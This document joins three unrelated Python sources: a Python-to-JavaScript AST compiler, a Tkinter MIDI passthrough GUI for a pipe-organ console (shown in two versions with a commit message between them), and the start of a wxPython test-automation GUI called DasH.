' $ctx.next_state = $ctx.try_stack.pop();',
' if ($ctx.next_state === undefined) throw $exception;',
' continue;',
' }',
' }',
])
if is_generator(node):
extend(tpl, indent('return new generator($ctx);'))
else:
extend(tpl, indent('return $ctx.func.call(this, $ctx);'))
extend(tpl, '};')
return tpl
#ClassDef(identifier name, expr* bases, stmt* body, expr* decorator_list)
def visit_ClassDef(self, node):
from .. import client
if len(node.bases) > 1:
raise NotImplementedError('Multiple inheritance not supported')
tpl = []
context = node.context or 'this'
if node.bases:
if isinstance(node.bases[0], ast.Attribute):
scope_name = node.bases[0].attr
scope = client._scopes.get(scope_name, None)
if scope:
return self.visit_ClientScope(node, scope)
args = []
for c in node.body:
if isinstance(c, ast.FunctionDef) and c.name == '__init__':
args = [self.visit(a, inherit=False) for a in c.args.args]
# Constructor
node.name = self.safe_name(node.name)
extend(tpl, '{0}.{1} = function {1}({2}) {{'.format(
context, node.name, ', '.join(args[1:])))
# Allow object creation without using `new`
extend(tpl, ' if (!(this instanceof {0})) return new {0}({1});'.
format(node.name, ', '.join(args[1:])))
for c in node.body:
if not isinstance(c, ast.FunctionDef):
extend(tpl, indent(self.visit(c)))
extend(tpl, ' if (this.__init__) this.__init__({0});'.
format(', '.join(args[1:])))
extend(tpl, '};')
# Class body
prototype = '%s.%s.prototype' % (context, node.name)
if node.bases:
extend(tpl, [
'var $F = function() {};',
'$F.prototype = %s.prototype;' % self.visit(node.bases[0]),
'%s.%s.prototype = new $F();' % (context, node.name)
])
for c in node.body:
if isinstance(c, ast.FunctionDef):
c.context = prototype
extend(tpl, self.visit_FunctionDef(c, bound=True))
return tpl
def visit_ClientScope(self, node, scope):
context = node.context or 'this'
inject = ['$scope', '$element']
tpl = [
'{0}.{1} = function {2}({3}) {{'.format(
context, scope['name'], node.name, ', '.join(inject))
]
for c in node.body:
extend(tpl, indent(self.visit(c, '$scope')))
# Events
tpl_on = '\n'.join(indent([
'$element.on("{0}", "{1}", function eventHandler(e) {{',
' var t = angular.element(e.target).scope();',
' $scope.$apply(function() {{ $scope.{2}($scope, t, e) }});',
'}})'
]))
extend(tpl, [tpl_on.format(*e) for e in scope['events']])
extend(tpl, indent([
'$scope.$on("$destroy", function() {',
' $element.off();',
'})'
]))
# Support repeat scope
extend(tpl, indent([
'var $getattr = $scope.__getattr__;',
'$scope.__getattr__ = function __getattr__(self, value) {',
' return self.$item && self.$item[value] ||',
' $getattr && $getattr(self, value);',
'}'
]))
# Scope constructor
extend(tpl, indent([
'if ($scope.__init__) {',
' var __init__ = $scope.__init__;',
' delete $scope.__init__;',
' __init__($scope);',
'}'
]))
return extend(tpl, [
'};', '{0}.{1}.$inject = {2};'.format(
context, scope['name'], json.dumps(inject))
])
# Assign(expr* targets, expr value)
def visit_Assign(self, node):
tpl = []
if isinstance(node.value, ast.Yield):
extend(tpl, self.visit(node.value))
extend(tpl, 'var $assign = $ctx.send;')
else:
extend(tpl, 'var $assign = {0};'.format(self.visit(node.value)))
for target in node.targets:
if isinstance(target, ast.Tuple):
for i, t in enumerate(target.elts):
t = self.visit(t)
if not node.context:
tpl.append('var {0} = $assign[{1}];'.format(t, i))
tpl.append('{0} = $assign[{1}];'.format(t, i))
else:
target = self.visit(target)
if not node.context:
tpl.append('var {0} = $assign;'.format(target))
tpl.append('{0} = $assign;'.format(target))
return tpl
# AugAssign(expr target, operator op, expr value)
def visit_AugAssign(self, node):
target = self.visit(node.target)
op = JSCompiler.BIN_OP[type(node.op)]
value = self.visit(node.value)
return '{0} {1}= {2};'.format(target, op, value)
# For(expr target, expr iter, stmt* body, stmt* orelse)
def visit_For(self, node):
if node.orelse:
raise NotImplementedError('For else statement not supported')
if not node.branch:
raise SyntaxError('For statement not inside a function block')
tpl = []
node.loop_point = loop_point = node.branch.create()
node.break_point = break_point = node.branch.create()
try_except_point = node.branch.create()
try_continue_point = node.branch.create()
target_node = ast.Name('iter', None)
assign_node = ast.Assign([target_node], node.iter)
assign_node.context = '$ctx.local'
extend(tpl, self.visit_Assign(assign_node))
extend(tpl, [
'case {0}:'.format(loop_point),
'$ctx.try_stack.push({0});'.format(try_except_point),
'{0} = $ctx.local.iter.next();'.format(self.visit(node.target)),
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point),
'if ($exception instanceof StopIteration) {',
' $ctx.next_state = {0}; continue; '.format(break_point),
'}',
'throw $exception;',
'case {0}:'.format(try_continue_point)
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# While(expr test, stmt* body, stmt* orelse)
def visit_While(self, node):
if node.orelse:
raise NotImplementedError('While else statement not supported')
if not node.branch:
raise SyntaxError('While statement not inside a function block')
tpl = []
loop_point = node.branch.create()
break_point = node.branch.create()
extend(tpl, [
'case {0}:'.format(loop_point),
'if (!({0})) {{'.format(self.visit(node.test)),
' $ctx.next_state = {0}; continue;'.format(break_point),
'}'
])
for c in node.body:
extend(tpl, self.visit(c, '$ctx.local'))
extend(tpl, [
'$ctx.next_state = {0}; continue;'.format(loop_point),
'case {0}:'.format(break_point)
])
return tpl
# Print(expr? dest, expr* values, bool nl)
def visit_Print(self, node):
return 'console.log({0});'.format(
', '.join([self.visit(v) for v in node.values]))
# If(expr test, stmt* body, stmt* orelse)
def visit_If(self, node):
tpl = ['if ({0}) {{'.format(self.visit(node.test))]
for c in node.body:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
if node.orelse:
tpl.append('else {')
for c in node.orelse:
extend(tpl, indent(self.visit(c)))
tpl.append('}')
return tpl
# Py2: Raise(expr? type, expr? inst, expr? tback)
# Py3: Raise(expr? exc, expr? cause)
def visit_Raise(self, node):
if hasattr(node, 'type'):
return 'throw {0}'.format(self.visit(node.type))
else:
return 'throw {0}'.format(self.visit(node.exc))
# TryExcept(stmt* body, excepthandler* handlers, stmt* orelse)
def visit_TryExcept(self, node):
if not node.branch:
raise SyntaxError('Try block not inside a function block')
try_except_point = node.branch.create()
try_continue_point = node.branch.create()
tpl = ['$ctx.try_stack.push({0});'.format(try_except_point)]
for c in node.body:
extend(tpl, self.visit(c))
extend(tpl, [
'$ctx.try_stack.pop();',
'$ctx.next_state = {0}; continue;'.format(try_continue_point),
'case {0}:'.format(try_except_point)
])
for c in node.handlers:
extend(tpl, self.visit(c))
extend(tpl, 'case {0}:'.format(try_continue_point))
return tpl
# Try(stmt* body, excepthandler* handlers, stmt* orelse, stmt* finalbody)
def visit_Try(self, node):
return self.visit_TryExcept(node)
# Import(alias* names)
def visit_Import(self, node):
return ''
# ImportFrom(identifier? module, alias* names, int? level)
def visit_ImportFrom(self, node):
return ''
# Expr(expr value)
def visit_Expr(self, node):
return self.visit(node.value)
# Pass
def visit_Pass(self, node):
return ['// pass']
# Break
def visit_Break(self, node):
if not node.break_point:
raise SyntaxError('Break not inside a loop block')
return '$ctx.next_state = {0}; continue;'.format(node.break_point)
# Continue
def visit_Continue(self, node):
if not node.loop_point:
raise SyntaxError('Continue not inside a loop block')
return '$ctx.next_state = {0}; continue;'.format(node.loop_point)
# BoolOp(boolop op, expr* values)
def visit_BoolOp(self, node):
op = JSCompiler.BOOL_OP[type(node.op)]
return '({0})'.format(op.join([self.visit(v) for v in node.values]))
# BinOp(expr left, operator op, expr right)
def visit_BinOp(self, node):
left = self.visit(node.left)
op = JSCompiler.BIN_OP[type(node.op)]
right = self.visit(node.right)
return '{0} {1} {2}'.format(left, op, right)
# UnaryOp(unaryop op, expr operand)
def visit_UnaryOp(self, node):
op = JSCompiler.UNARY_OP[type(node.op)]
operand = self.visit(node.operand)
return '{0}({1})'.format(op, operand)
# Dict(expr* keys, expr* values)
def visit_Dict(self, node):
return '{{ {0} }}'.format(', '.join([
'{0}: {1}'.format(self.visit(kv[0]), self.visit(kv[1]))
for kv in zip(node.keys, node.values)
]))
# Yield(expr? value)
def visit_Yield(self, node):
if not node.branch:
raise SyntaxError('Yield not inside a function block')
yield_point = node.branch.create()
return [
'var $tmp = {0};'.format(self.visit(node.value)),
'$ctx.next_state = {0};'.format(yield_point),
'$ctx.result = $tmp;',
'return $ctx;',
'case {0}:'.format(yield_point),
]
#Compare(expr left, cmpop* ops, expr* comparators)
def visit_Compare(self, node):
left = self.visit(node.left)
ops = [JSCompiler.COMPARE_OP[type(op)] for op in node.ops]
comparators = [self.visit(c) for c in node.comparators]
tpl = []
for op, right in zip(ops, comparators):
tpl.append('{0} {1} {2}'.format(left, op, right))
left = right
return '&&'.join(tpl)
# Call(
# expr func, expr* args, keyword* keywords, xpr? starargs, expr? kwargs)
def visit_Call(self, node):
func = self.visit(node.func)
if isinstance(node.func, ast.Attribute):
func_context = self.visit(node.func.value)
else:
func_context = 'this'
if getattr(self.module, func, None) is JSCode:
return node.args[0].s
if func == 'print':
node.values = node.args
return self.visit_Print(node)
args = ', '.join([self.visit(a) for a in node.args])
return '{0}.apply({1}, [{2}])'.format(func, func_context, args)
# Num(object n)
def visit_Num(self, node):
return str(node.n)
# Str(string s)
def visit_Str(self, node):
return '"{0}"'.format(node.s).replace('\n', '\\n\\\n')
# Attribute(expr value, identifier attr, expr_context ctx)
def visit_Attribute(self, node):
if isinstance(node.ctx, ast.Load):
tpl = 'getattr({0}, "{1}")'
else:
tpl = '{0}.{1}'
return tpl.format(self.visit(node.value), node.attr)
# Subscript(expr value, slice slice, expr_context ctx)
def visit_Subscript(self, node):
value = self.visit(node.value)
index = self.visit(node.slice)
return '{0}[{1}]'.format(value, index)
# Name(identifier id, expr_context ctx)
def visit_Name(self, node):
lookup = self.lookup(node.id)
if lookup:
return lookup
elif node.id == 'None':
return 'undefined'
elif node.id == 'True':
return 'true'
elif node.id == 'False':
return 'false'
if node.context:
return '{0}.{1}'.format(node.context, node.id)
else:
return node.id
# List(expr* elts, expr_context ctx)
def visit_List(self, node):
return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
# Tuple(expr* elts, expr_context ctx)
def visit_Tuple(self, node):
return '[{0}]'.format(', '.join([self.visit(c) for c in node.elts]))
# Index(expr value)
def visit_Index(self, node):
return self.visit(node.value)
# ExceptHandler(expr? type, identifier? name, stmt* body)
def visit_ExceptHandler(self, node):
tpl = []
if node.type:
tpl.append('if ($exception instanceof {0}) {{'.format(
self.visit(node.type)))
else:
tpl.append('if ($exception) {')
for c in node.body:
extend(tpl, indent(self.visit(c)))
tpl.append(indent('$exception = undefined;'))
tpl.append('}')
return tpl
# arg = (identifier arg, expr? annotation)
def visit_arg(self, node):
return str(node.arg)
def indent(lines, spaces=2, level=1):
spaces = ' ' * (spaces * level)
if isinstance(lines, list):
return ['{0}{1}'.format(spaces, l) for l in lines]
else:
return '{0}{1}'.format(spaces, lines)
def extend(template, lines):
if isinstance(lines, list):
template.extend(lines)
else:
template.append(lines)
return template
def is_generator(node):
searcher = YieldSearch()
searcher.found_yield = False
if isinstance(node, ast.FunctionDef):
for c in node.body:
searcher.visit(c)
else:
searcher.visit(node)
return searcher.found_yield
def js_compile(obj):
if not getattr(obj, '__js__', None):
node = ast.parse(inspect.getsource(obj))
obj.__js__ = JSCompiler(obj).visit(node)
return obj.__js__
def runtime():
from . import types, builtins
return js_compile(types) + js_compile(builtins)
|
#!/usr/bin/env python
#
# GUI External MIDI Passthrough for Organ Donor Organelle
#
# 2015-11 ptw
from Tkinter import *
import tkFont
import sys
import signal
import re
import time
import itertools
from os.path import isfile
import mido
import rtmidi
root_bg = "#bbb"
deployed_mode = isfile("deployed.txt") # Create this file to go full-screen, etc.
def initialize_MIDI_inout():
"""Initialize MIDI input and output ports using RTMIDI through mido
We will go ahead and initialize all four of the input ports from the MIDIPLUS
interface, plus the output port to the console.
"""
#select rtmidi as our backend
mido.set_backend('mido.backends.rtmidi')
#print "Backend selected is %s " % mido.backend
# Enumerate the available port names
outports = mido.get_output_names()
# Now try to pick the right port to output on.
# If we're in the deployed configuration, it's a MIO adapter.
outport = None
for name in outports:
if re.match(r'mio', name):
try:
outport = mido.open_output(name)
break
except:
pass
if not outport:
print("Unable to open the MIO MIDI output port.")
sys.exit(1)
# Now locate the ports of the MIDIPLUS interface and open them for input.
port_prefix = 'MIDI4x4.*:'
inports = []
for port in ('0', '1', '2', '3'):
inports.append(open_midi_input_port(port_prefix + port))
if len(inports) != 4:
print("Unable to open MIDI input ports. Is the MIDIPLUS connected?")
sys.exit(1)
return (inports, outport)
def open_midi_input_port(regex):
"""Open a MIDI input port matching a given regular expression, and return it.
"""
inports = mido.get_input_names()
for name in inports:
if re.match(regex, name):
try:
p = mido.open_input(name)
except:
pass
else:
return p
inports,outport = initialize_MIDI_inout()
root = Tk()
root.config(bg=root_bg)
# This program ends normally when we receive a SIGUSR1 signal from the supervisor.
def handle_sigusr1(signum, frame):
root.quit()
signal.signal(signal.SIGUSR1, handle_sigusr1)
def poll_midi():
"""Poll the MIDI input ports.
Polling might seem ugly here, but it is apparently the only way that works.
Mido can provide a callback when each message comes in, but that callback runs
on another thread, and Tkinter prohibits doing much of anything on another thread.
The other thread could enqueue a message to the main thread, but then apparently
the recommended way to check such a queue would be ... polling. If there were a
thread-safe way to put an event into Tkinter's main event queue, we could avoid
polling, but there apparently isn't.
"""
for passthru in passthrus:
for message in passthru.port.iter_pending():
passthru.handle_message(message)
root.after(50, poll_midi)
def everything_off():
"""Turn off every note, in case it's stuck playing.
"""
for mynote in range(1,128):
outport.send(mido.Message('note_off', note=mynote, velocity=100))
def configure_console(flagMidi=1, flagKBecho=1, flagGhostBuster=1):
"""Send a SysEx to the console to set the configuration flags.
Definitions copied from the Arduino code:
// SysEx format:
// Byte# Value Meaning
// 0 F0 Start of SysEx command, defined by MIDI standard
// 1 7D Manufacturer code reserved for "educational use"
// 2 55 my command code for setting the flags
// 3 0,1,2 flagMidi
// 4 0 or 1 flagKBecho
// 5 0 or 1 flagGhostBuster
// etc. for more flags
// N F7 End of SysEx command, defined by MIDI standard
"""
outport.send(mido.Message('sysex', data=[0x7d, 0x55, flagMidi, flagKBecho, flagGhostBuster]))
enabledColor = 'green'
class MidiPortPassthru():
"""Object to handle configuration and passthrough of MIDI notes from an input port.
The object knows its port, and creates a GUI to set how messages from that port
are to be passed through to the console. It then handles messages according to
the user settings.
"""
def __init__(self, port):
self.port = port
self.enabled = IntVar()
self.enabled.set(1) # defaults to enabled
self.gui = Frame(root, height=110, width=800, bg=root_bg, bd=2, relief=SUNKEN)
port_name = "MIDI In " + chr(ord(port.name[-1])+1)
self.portlabel = Label(self.gui, text=port_name+':', font=("Helvetica", 24), fg='black', bg=root_bg)
self.portlabel.pack(side=LEFT)
self.enabledButton = Checkbutton(self.gui, text="Enabled ", font=("Helvetica", 18), padx=0, pady=0, bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor, variable=self.enabled, command=self._enabledCallback)
self.enabledButton.pack(side=LEFT)
#!!! construct rest of GUI here
def _enabledCallback(self):
if self.enabled.get() == 1:
self.portlabel.config(fg='black')
self.enabledButton.config(bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor)
#!!! enable secondary controls here
else:
self.portlabel.config(fg='gray')
self.enabledButton.config(bg=root_bg, activebackground=root_bg, highlightbackground=root_bg)
#!!! disable secondary controls here
everything_off() # just in case there are notes left playing
# This disrupts the other channels, but to avoid that
# we'd need to keep track of all the notes played. Ugh.
pass
def handle_message(self, msg):
if self.enabled.get() == 1:
#!!! lots more logic here
outport.send(msg)
configure_console(flagMidi=2) # Make sure console allows access to both ranks
Label(root, text="Play From MIDI Devices", font=("Helvetica", 36), fg='red', bg=root_bg, padx=4, pady=2).pack()
# Associate each input port with a MidiPortPassthru and put their GUIs on the screen.
passthrus = []
for port in inports:
passthru = MidiPortPassthru(port)
passthrus.append(passthru)
passthru.gui.pack(fill=BOTH, expand=1)
poll_midi() # kick off a frequent poll of the MIDI input port
if deployed_mode:
root.attributes("-fullscreen", True)
else:
# for debug, use the same screen size as the real screen, in a handy screen position.
root.geometry("800x480+50+50")
root.mainloop()
print("Here we are cleaning up.")
Implement MIDI passthru to different ranks of pipes
Chose five discrete modes to offer with individual buttons on screen,
instead of a more general, but more complex, user interface.
#!/usr/bin/env python
#
# GUI External MIDI Passthrough for Organ Donor Organelle
#
# 2015-11 ptw
from Tkinter import *
import tkFont
import sys
import signal
import re
import time
import itertools
from os.path import isfile
import mido
import rtmidi
root_bg = "#bbb"
deployed_mode = isfile("deployed.txt") # Create this file to go full-screen, etc.
def initialize_MIDI_inout():
"""Initialize MIDI input and output ports using RTMIDI through mido
We will go ahead and initialize all four of the input ports from the MIDIPLUS
interface, plus the output port to the console.
"""
#select rtmidi as our backend
mido.set_backend('mido.backends.rtmidi')
#print "Backend selected is %s " % mido.backend
# Enumerate the available port names
outports = mido.get_output_names()
# Now try to pick the right port to output on.
# If we're in the deployed configuration, it's a MIO adapter.
outport = None
for name in outports:
if re.match(r'mio', name):
try:
outport = mido.open_output(name)
break
except:
pass
if not outport:
print("Unable to open the MIO MIDI output port.")
sys.exit(1)
# Now locate the ports of the MIDIPLUS interface and open them for input.
port_prefix = 'MIDI4x4.*:'
inports = []
for port in ('0', '1', '2', '3'):
inports.append(open_midi_input_port(port_prefix + port))
if len(inports) != 4:
print("Unable to open MIDI input ports. Is the MIDIPLUS connected?")
sys.exit(1)
return (inports, outport)
def open_midi_input_port(regex):
"""Open a MIDI input port matching a given regular expression, and return it.
"""
inports = mido.get_input_names()
for name in inports:
if re.match(regex, name):
try:
p = mido.open_input(name)
except:
pass
else:
return p
inports,outport = initialize_MIDI_inout()
root = Tk()
root.config(bg=root_bg)
# This program ends normally when we receive a SIGUSR1 signal from the supervisor.
def handle_sigusr1(signum, frame):
root.quit()
signal.signal(signal.SIGUSR1, handle_sigusr1)
def poll_midi():
"""Poll the MIDI input ports.
Polling might seem ugly here, but it is apparently the only way that works.
Mido can provide a callback when each message comes in, but that callback runs
on another thread, and Tkinter prohibits doing much of anything on another thread.
The other thread could enqueue a message to the main thread, but then apparently
the recommended way to check such a queue would be ... polling. If there were a
thread-safe way to put an event into Tkinter's main event queue, we could avoid
polling, but there apparently isn't.
"""
for passthru in passthrus:
for message in passthru.port.iter_pending():
passthru.handle_message(message)
root.after(50, poll_midi)
def everything_off():
"""Turn off every note, in case it's stuck playing.
"""
for mynote in range(1,128):
outport.send(mido.Message('note_off', note=mynote, velocity=100))
def configure_console(flagMidi=1, flagKBecho=1, flagGhostBuster=1):
"""Send a SysEx to the console to set the configuration flags.
Definitions copied from the Arduino code:
// SysEx format:
// Byte# Value Meaning
// 0 F0 Start of SysEx command, defined by MIDI standard
// 1 7D Manufacturer code reserved for "educational use"
// 2 55 my command code for setting the flags
// 3 0,1,2 flagMidi
// 4 0 or 1 flagKBecho
// 5 0 or 1 flagGhostBuster
// etc. for more flags
// N F7 End of SysEx command, defined by MIDI standard
"""
outport.send(mido.Message('sysex', data=[0x7d, 0x55, flagMidi, flagKBecho, flagGhostBuster]))
enabledColor = 'green'
class MidiPortPassthru():
"""Object to handle configuration and passthrough of MIDI notes from an input port.
The object knows its port, and creates a GUI to set how messages from that port
are to be passed through to the console. It then handles messages according to
the user settings.
A MIDI port can be translated to console notes in a few different ways:
* Thru mode -- all messages are passed thru on the channel they're received on
* 4' Rank mode -- Note On and Note Off messages on any channel go to the 4' rank
* 8' Rank mode -- Note On and Note Off messages on any channel go to the 8' rank
* Both Ranks mode -- Note On and Note Off messages on any channel go to both ranks
* Max mode -- Note On and Note Off messages on any channel go to both ranks, AND
are tripled with octave and suboctave couplers.
The controls could be more general, but it would be too complex on screen.
"""
MODE_PASSTHRU, MODE_4FT, MODE_8FT, MODE_BOTH, MODE_MAX = range(5)
ModeButtons = [
("Thru", MODE_PASSTHRU),
("4' Rank", MODE_4FT),
("8' Rank", MODE_8FT),
("Both Ranks", MODE_BOTH),
("Max", MODE_MAX)
]
def __init__(self, port):
self.port = port
self.enabled = IntVar()
self.enabled.set(1) # defaults to enabled
self.gui = Frame(root, height=110, width=800, bg=root_bg, bd=2, relief=SUNKEN)
port_name = "MIDI In " + chr(ord(port.name[-1])+1)
self.portlabel = Label(self.gui, text=port_name+':', font=("Helvetica", 24), fg='black', bg=root_bg)
self.portlabel.pack(side=LEFT)
self.enabledButton = Checkbutton(self.gui, text="Enabled ", font=("Helvetica", 18), padx=0, pady=0, bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor, variable=self.enabled, command=self._enabledCallback)
self.enabledButton.pack(side=LEFT)
self.mode = IntVar()
self.mode.set(MODE_PASSTHRU)
self.modeButtons = []
for text,value in ModeButtons:
self.modeButtons.append(Radiobutton(self.gui, text=text, value=value, variable=self.mode, bg=ModeButtonColor, highlightcolor=ModeButtonColor, indicatoron=0))
for button in self.modeButtons:
button.pack(side=LEFT)
def _enabledCallback(self):
if self.enabled.get() == 1:
self.portlabel.config(fg='black')
self.enabledButton.config(bg=enabledColor, activebackground=enabledColor, highlightbackground=enabledColor)
for button in self.modeButtons:
button.config(state=NORMAL)
else:
self.portlabel.config(fg='gray')
self.enabledButton.config(bg=root_bg, activebackground=root_bg, highlightbackground=root_bg)
for button in self.modeButtons:
button.config(state=DISABLED)
everything_off() # just in case there are notes left playing
# This disrupts the other channels, but to avoid that
# we'd need to keep track of all the notes played. Ugh.
pass
def handle_message(self, msg):
if self.enabled.get() == 1:
#!!! lots more logic here
outport.send(msg)
configure_console(flagMidi=2) # Make sure console allows access to both ranks
Label(root, text="Play From MIDI Devices", font=("Helvetica", 36), fg='red', bg=root_bg, padx=4, pady=2).pack()
# Associate each input port with a MidiPortPassthru and put their GUIs on the screen.
passthrus = []
for port in inports:
passthru = MidiPortPassthru(port)
passthrus.append(passthru)
passthru.gui.pack(fill=BOTH, expand=1)
poll_midi() # kick off a frequent poll of the MIDI input port
if deployed_mode:
root.attributes("-fullscreen", True)
else:
# for debug, use the same screen size as the real screen, in a handy screen position.
root.geometry("800x480+50+50")
root.mainloop()
print("Here we are cleaning up.")
|
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
from datetime import datetime
import wx.grid as gridlib
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
#from dut import dut
class RedirectText(object):
font_point_size = 10
old_stdout = None
old_stderr = None
write_lock = None
log_file = None
def __init__(self,aWxTextCtrl, log_path=None):
self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
self.out=aWxTextCtrl
self.font_point_size = self.out.GetFont().PointSize
self.write_lock = threading.Lock()
if log_path:
name = '{}/dash.log'.format(log_path)
self.log_file = open(name, 'w+')
self.fileno = self.log_file.fileno
def write(self,string):
self.write_lock.acquire()
self.old_stdout.write(string)
#string = string.replace('\\033\[[0-9\;]+m', '')
#self.old_stderr.write(string)
if re.search('error|\s+err\s+|fail|wrong',string.lower()):
self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW, font =wx.Font(self.font_point_size+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))#wx.CallAfter(s
else:
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
wx.CallAfter(self.out.AppendText, string)
if self.log_file:
self.log_file.write(string)
self.log_file.flush()
self.write_lock.release()
def close(self):
if self.log_file:
self.log_file.flush()
self.log_file.close()
class process_info(object):
process = None
pid=None
full_name=None
returncode = None
def __init__(self,name, process):
self.process= process
self.pid = process.pid
self.full_name =name
self.returncode = process.returncode
@property
def returncode(self):
return self.process.returncode
class FileEditor(wx.Panel):
editor =None
font_size=10
parent=None
type = None
sessions_node =None
function_node =None
case_suite_node =None
full_file_name = None
file_instance = None
def on_close(self):
if self.full_file_name:
data = self.editor.GetValue()
with open(self.full_file_name, 'w') as f:
f.write(data)
f.flush()
#done 2017-9-12: handle close tab in edit_area
def __init__(self, parent, title='pageOne', type ='grid', file_name = None):
wx.Panel.__init__(self, parent)
self.parent = parent
self.type = type
self.full_file_name = file_name
#self.editor = wx.TextCtrl(self, style = wx.TE_MULTILINE|wx.TE_RICH2|wx.EXPAND|wx.ALL, size=(-1,-1))
if type in ['text']:
self.editor = wx.TextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, wx.TE_AUTO_URL|wx.VSCROLL|wx.TE_RICH|wx.TE_MULTILINE&(~wx.TE_PROCESS_ENTER))
#wx.richtext.RichTextCtrl( self, -1, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, 0|wx.VSCROLL|wx.HSCROLL|wx.NO_BORDER|wx.WANTS_CHARS )
with open(self.full_file_name, 'r') as f:
for line in f.readlines():
self.editor.AppendText(line)
else:
self.editor= gridlib.Grid(self)
self.editor.CreateGrid(50, 5)
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
function_color ='black'
arg_color = 'blue'
for c in range(0, col):
if c < 1 :
self.editor.SetColLabelValue(c, 'Function Name')
else:
self.editor.SetColLabelValue(c, 'arg# {}'.format(c))
for r in range (0, row):
self.editor.SetCellTextColour(r,c,function_color if c <1 else arg_color)
for r in range (0, row):
self.editor.SetCellFont(r, 0, wx.Font(self.font_size,wx.SWISS, wx.NORMAL, wx.BOLD ))
self.editor.Bind( wx.EVT_MOUSEWHEEL, self.editor_OnMouseWheel )
sizer = wx.BoxSizer()
sizer.Add(self.editor, 1, wx.EXPAND)
self.SetSizer(sizer)
def editor_OnMouseWheel(self,event):
min_font_size = 5
interval_step = 2
if event.ControlDown():
pass
else:
return
if event.GetWheelRotation() < 0:
if self.font_size>min_font_size:
self.font_size-=interval_step
else:
self.font_size+=1
if self.type in ['text']:
f =self.editor.GetFont()
f.PointSize= self.font_size
self.editor.SetFont(f)
else:
col = self.editor.GetNumberCols()
row = self.editor.GetNumberRows()
for c in range(0, col):
for r in range (0, row):
f = self.editor.GetCellFont(r, c)
f.PointSize = self.font_size
self.editor.SetCellFont(r, c, f)
self.Refresh()
#wx.StaticText(self, -1, "THIS IS A PAGE OBJECT", (20,20))
#DONE: DasHFrame should handle CLOSE event when closing the app, call on_close_tab_in_edit_area for all opened sessions and files
class DasHFrame(MainFrame):#wx.Frame
ini_setting = None
#m_left_navigator =None
redir = None
edit_area=None
tabs_in_edit_area = None
src_path = None
sessions_alive=None
sequence_queue=None
history_cmd = []
history_cmd_index = -1
import_modules={'TC':'TC'}
lib_path ='./lib'
log_path = '../log'
session_path = './sessions'
running_process=None
dict_test_report= None
def __init__(self,parent=None, ini_file = './gDasH.ini'):
#wx.Frame.__init__(self, None, title="DasH")
self.dict_test_report={}
self.running_process = list()
self.tabs_in_edit_area=[]
self.sessions_alive={}
MainFrame.__init__(self, parent=parent)
self.sequence_queue= Queue.Queue()
#self.sequence_queue.put()
self.ini_setting = ConfigParser.ConfigParser()
self.ini_setting.read(ini_file)
self.src_path = os.path.abspath(self.ini_setting.get('dash','src_path'))
self.lib_path = os.path.abspath(self.ini_setting.get('dash','lib_path'))
self.log_path = os.path.abspath(self.ini_setting.get('dash','log_path'))
from lib.common import create_case_folder
sys.argv.append('-l')
sys.argv.append('{}'.format(self.log_path))
self.log_path = create_case_folder(self.log_path)
if not os.path.exists(self.log_path):
os.mkdir(self.log_path)
self.add_src_path_to_python_path(self.src_path)
self.redir = RedirectText(self.m_log, self.log_path)
sys.stdout = self.redir
sys.stderr = self.redir
self.m_log.SetBackgroundColour('Black')
self.m_log.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK, font =wx.Font(9, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.BOLD, faceName = 'Consolas')))
#self.m_editor.WriteText('welcome to dash world')
self.m_log.WriteText('Welcome to DasH!\n')
self.m_command_box.WriteText('functions.static_function_in_module test_ssh 2')
fileMenu = wx.Menu()
open_test_suite = fileMenu.Append(wx.NewId(), "Open TestSuite", "Open a Test Suite")
open_test_case = fileMenu.Append(wx.NewId(), "Open TestCase", "Open a Test Case")
self.m_menubar_main.Append(fileMenu, "&Open")
self.Bind(wx.EVT_CLOSE, self.on_close)
self.m_command_box.Bind(wx.EVT_TEXT_ENTER, self.on_command_enter)
self.m_command_box.Bind(wx.EVT_KEY_UP, self.on_key_up)
